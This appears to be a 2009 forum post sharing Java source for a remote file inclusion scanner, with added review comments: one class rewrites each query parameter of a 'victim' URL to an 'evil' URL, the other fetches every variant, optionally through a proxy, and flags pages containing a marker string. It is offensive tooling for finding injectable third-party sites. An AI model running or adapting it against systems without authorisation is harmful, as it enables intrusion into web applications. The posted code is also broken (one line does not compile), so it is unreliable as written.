hozarares Posted December 4, 2009 Report Posted December 4, 2009 (edited)

:::=== RFISCANNER.JAVA ===:::
package rrfiscanner;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.MalformedURLException;
import java.net.Proxy;
import java.net.URL;
import java.net.URLConnection;

/**
 * Requests every URL variant produced by {@link PrepareURL} and reports those whose
 * response contains a configured marker string.
 *
 * <p>A reported hit means only that some line of the response body contained the search
 * word; the code performs no further confirmation, so a page that echoes its own query
 * string can match as well.
 *
 * <p>NOTE(review): on the receiving server each probe is a request in which one query
 * parameter value has been replaced by the configured string (presumably an absolute
 * URL); that is the pattern input validation and request logging can key on.
 */
public class RfiScanner {
    // Proxy handed to URL.openConnection(Proxy) when _useProxy is true.
    private Proxy _conProxy;
    // Selects between the proxied and the direct connection in scan().
    private boolean _useProxy;
    // Marker looked for in each response line; stays null until setSearchWord() is called.
    private String _SEARCH_WORD;
    // _vUrl: URL whose parameters are rewritten; _aUrl: the replacement parameter value.
    private String _vUrl,_aUrl;

    /**
     * Stores the two strings that scan() later passes to {@link PrepareURL}.
     *
     * @param vUrl URL whose query parameters are rewritten one at a time
     * @param aUrl value substituted for each parameter value
     */
    public RfiScanner(String vUrl,String aUrl) {
        this._vUrl = vUrl;
        this._aUrl = aUrl;
    }

    /**
     * @param use true to open connections through the proxy given to setProxy()
     */
    public void setUseProxy(boolean use){
        this._useProxy = use;
    }

    /**
     * @param proxy proxy used by scan() when proxy use is enabled
     */
    public void setProxy(Proxy proxy){
        this._conProxy = proxy;
    }

    /**
     * @param word string whose presence in a response line marks the URL as a hit
     */
    public void setSearchWord(String word){
        this._SEARCH_WORD = word;
    }

    /**
     * Builds the URL variants, fetches each one and prints the variants whose response
     * contains the search word.
     *
     * <p>Progress and hits go to standard output; errors that end the scan go to
     * standard error. Nothing is returned and nothing is thrown to the caller.
     */
    public void scan(){
        try {
            PrepareURL victimURL = new PrepareURL(_vUrl,_aUrl);
            URLConnection uc = null;
            while(victimURL.hasNext()) {
                URL u = victimURL.next();
                // openConnection() sits outside the inner try, so an exception thrown here
                // (including the one URL.openConnection(Proxy) raises for a null proxy)
                // reaches the outer catch and ends the whole scan.
                if (_useProxy) {
                    uc = u.openConnection(_conProxy);
                } else {
                    uc = u.openConnection();
                }
                try{
                    System.out.println("SCANNING: " + u.toString());
                    // The reader is never closed, and the InputStreamReader is created
                    // without a charset, so the platform default decoding applies.
                    BufferedReader r = new BufferedReader(new InputStreamReader(uc.getInputStream()));
                    String c;
                    while ((c = r.readLine()) != null) {
                        // indexOf(null) throws NullPointerException when setSearchWord()
                        // was never called; that is not an IOException, so it ends the scan.
                        if(c.indexOf(_SEARCH_WORD) != -1) {
                            System.out.println("VULNERABLE URL: " + u.toString());
                            break; // first matching line is enough for this URL
                        }
                    }
                }catch(IOException ioe){
                    // Read failures are dropped silently: a URL that could not be fetched
                    // looks the same in the output as one that was fetched without a match.
                }
            }
        } catch (MalformedURLException mfue) {
            // Thrown by the PrepareURL constructor when a rewritten URL does not parse.
            System.err.println(mfue.toString());
        } catch (Exception e) {
            // Any other failure ends the scan with a single line on stderr.
            System.err.println(e.toString());
        }
    }
}

:::=== PREPAREURL.JAVA ===:::
package rrfiscanner;

import java.net.MalformedURLException;
import java.net.URL;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Set;

/**
 * Builds, for one input URL, a list of variants in which a single query parameter value
 * is replaced by a fixed string, and exposes that list through a hasNext()/next() cursor.
 */
public class PrepareURL {
    // Cursor value meaning "before the first element".
    private static final int _nextItemInitialize = -1;
    // Input URL as given to the constructor.
    private String _victimURL;
    // Replacement value written into each parameter in turn.
    private String _evilUrl;
    // One rewritten URL per distinct parameter name; filled once by fillList().
    private ArrayList<URL> _attackUrlList;
    // Index of the element most recently returned by next().
    private int _nextItem;

    /**
     * Stores both strings and builds the variant list immediately.
     *
     * @param victimUrl URL whose query parameters are rewritten
     * @param attackUrl value substituted for each parameter value
     * @throws MalformedURLException if a rewritten URL cannot be parsed
     */
    public PrepareURL(String victimUrl,String attackUrl) throws MalformedURLException {
        this._victimURL = victimUrl;
        this._evilUrl = attackUrl;
        _nextItem = _nextItemInitialize;
        fillList();
    }

    /**
     * @return true if next() can be called, false once the cursor is on the last element
     *         (also false for an empty list, where size()-1 equals the initial cursor)
     */
    public boolean hasNext() {
        if(_nextItem == (_attackUrlList.size()-1)) {
            return false;
        }
        return true;
    }

    /**
     * Advances the cursor and returns the element it now points to. There is no bounds
     * check: calling this when hasNext() is false makes ArrayList.get throw
     * IndexOutOfBoundsException.
     *
     * @return the next rewritten URL
     */
    public URL next() {
        _nextItem++;
        return _attackUrlList.get(_nextItem);
    }

    /**
     * Moves the cursor back before the first element so the list can be walked again.
     */
    public void reset() {
        _nextItem = _nextItemInitialize;
    }

    /**
     * Parses the query string of the input URL and adds one rewritten URL per parameter
     * name to the list.
     *
     * @throws MalformedURLException if a rewritten string is not a valid URL
     */
    private void fillList() throws MalformedURLException {
        // Without a "?" indexOf returns -1, so substring(0) yields the whole URL and the
        // whole URL is then parsed as if it were the query string.
        String query = _victimURL.substring(_victimURL.indexOf("?")+1);
        _attackUrlList = new ArrayList<URL>();
        // substring() never returns null, so this condition is always true.
        if(query != null) {
            // HashMap: a repeated parameter name keeps only its last value, and the
            // iteration order of the names is unspecified.
            HashMap<String,String> paramPairs = getParameters(query);
            Set<String> paramNames = paramPairs.keySet();
            Iterator<String> iParamNames = paramNames.iterator();
            String str;
            while(iParamNames.hasNext()) {
                str = iParamNames.next();
                // String.replace substitutes every occurrence of the literal "name=value"
                // anywhere in the URL, not only the parameter being rewritten.
                _attackUrlList.add(new URL(_victimURL.replace(str+"="+paramPairs.get(str), str+"="+_evilUrl)));
            }
        }
    }

    /**
     * Splits a query string on "&amp;" and "=" into a name-to-value map.
     *
     * @param query query string to break into parameters
     * @return map from parameter name to parameter value
     */
    private HashMap<String,String> getParameters(String query) {
        HashMap<String,String> paramPairs = new HashMap<String,String>();
        String[] rawPairs = query.split("&");
        for(int i=0;i<rawPairs.length;i++) {
            // NOTE(review): as posted this line does not compile, because String[] has no
            // split method; presumably an array index was lost in the forum rendering.
            String[] keyValue = rawPairs.split("=");
            // keyValue[z+1] is read without a length check, so a pair that splits into an
            // odd number of pieces (for example a name with no value) would raise
            // ArrayIndexOutOfBoundsException.
            for(int z=0;z<keyValue.length;z+=2) {
                paramPairs.put(keyValue[z], keyValue[z+1]);
            }
        }
        return paramPairs;
    }
}

Edited December 4, 2009 by hozarares Quote